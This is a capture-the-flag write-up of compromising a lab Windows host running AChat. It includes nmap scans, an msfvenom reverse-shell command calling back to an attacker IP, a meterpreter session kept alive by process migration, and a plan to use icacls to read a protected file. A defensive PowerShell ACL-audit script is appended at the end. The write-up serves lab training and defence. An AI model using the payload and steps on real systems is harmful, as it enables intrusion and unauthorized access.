Finding an open port on this one was murderous, super slow; small groups of nmap scans, 1000 ports at a time, were the way to discover that the ONLY open port (so far, at least) was 9256.
Further enumeration of that port (nmap -sC -sS -A -p 9256 10.10.10.74):
PORT STATE SERVICE VERSION
9256/tcp open achat AChat chat system
Googling for achat exploits, since that’s literally all I’ve got to go on, yields: https://www.exploit-db.com/exploits/36025/
I changed the shellcode in that to:
msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.11 LPORT=4443 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
I ran the exploit, and it appears to complete, but I never get a shell back.
I tried it again using a simple windows/shell/reverse_tcp payload, still nothing. My assumption was that Meterpreter was just too much and I needed something simpler, and I’m still pretty sure that’s correct. I did a fresh reset on the box since it had been 4 days, and got back:
So, now, it’s connecting back, but dying after like 10 seconds. I kept thinking this HAD to work, but none of my commands would execute. I tried several variations, and what finally worked (with enough time to run ONE command), was using the meterpreter payload, and the multi/handler to catch it.
Unfortunately, I could only run one command, so I had to make it count. I created the connection, and used ps to list processes, identifying the PID of explorer.exe. My assumption was something running on the box that was killing unauthorized processes, so if I could migrate to that before it killed it, I might be able to sustain a connection.
Ran the exploit again, but this time used migrate to get to the PID of explorer.exe. The connection was stable from here on out.
Finally. I am in as user Alfred, and I navigate to his desktop to retrieve the user.txt file.
I can also navigate TO the desktop of the Administrator, but cannot read the root.txt. I need to determine privesc here. It’s not even really privesc, because I clearly already have some higher level privs than a usual user would have. But this file has different permissions that don’t allow me to read it.
There's a tool in Windows that allows you to change the permissions on files from the CLI: icacls. Since the shell dumped me out in a high-priv folder (system32), and I can at least get TO root.txt, I figured I've probably got the permissions to change the file and grab the hash.
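The icacls change described above is exactly the kind of ACL drift a defender wants to catch on a sensitive file. As an added example (not part of this write-up), the following PowerShell audit reads a file's ACL and reports any principal outside an assumed trusted list that can read the file, write it, or rewrite its permissions; the path and the trusted list are placeholders.

```powershell
# Added example, not from the original write-up.
# Audit a sensitive file's ACL: flag owner, inheritance and any Allow ACE that
# lets a principal outside $Trusted read/write the file or change its DACL.
function Test-SensitiveFileAcl {
    param(
        [Parameter(Mandatory)] [string]$Path,
        # Placeholder allow-list; adjust to the host's real administrative principals.
        [string[]]$Trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')
    )

    $acl = Get-Acl -LiteralPath $Path
    $findings = @()

    # The owner can always rewrite the DACL, regardless of the ACEs present.
    if ($acl.Owner -notin $Trusted) {
        $findings += "Owner '$($acl.Owner)' is not a trusted principal"
    }

    # With inheritance on, the parent folder's ACEs apply to this file too.
    if (-not $acl.AreAccessRulesProtected) {
        $findings += 'Inheritance enabled: parent-folder ACEs apply to this file'
    }

    # Rights that matter here: reading/writing content, or re-ACLing the file.
    $fsr = [System.Security.AccessControl.FileSystemRights]
    $mask = [int]$fsr::ReadData -bor [int]$fsr::WriteData -bor
            [int]$fsr::ChangePermissions -bor [int]$fsr::TakeOwnership

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }   # Deny ACEs only restrict
        $who = $ace.IdentityReference.Value
        if ($who -in $Trusted) { continue }
        # Cast to int so generic/unnamed right bits do not break the enum comparison.
        if (([int]$ace.FileSystemRights -band $mask) -ne 0) {
            $findings += "Allow ACE for '$who': $($ace.FileSystemRights)"
        }
    }
    return $findings
}

# Placeholder path; run against the real protected file on the host being audited.
$result = Test-SensitiveFileAcl -Path 'C:\Users\Administrator\Desktop\root.txt'
if ($result.Count -eq 0) { 'OK: only trusted principals can read or re-ACL the file' }
else { 'Review needed:'; $result | ForEach-Object { "  - $_" } }
```

Any finding for a non-administrative account is worth correlating with file-system audit events (object access auditing on the file) to see when and by whom the ACL was changed.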